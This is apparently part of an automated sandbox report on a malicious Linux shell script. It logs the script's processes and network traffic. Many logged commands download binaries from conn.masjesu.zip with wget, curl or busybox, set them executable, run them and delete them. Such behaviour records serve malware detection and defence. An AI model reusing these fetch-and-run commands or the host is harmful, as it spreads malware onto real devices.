| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
Processes
/tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
[/tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
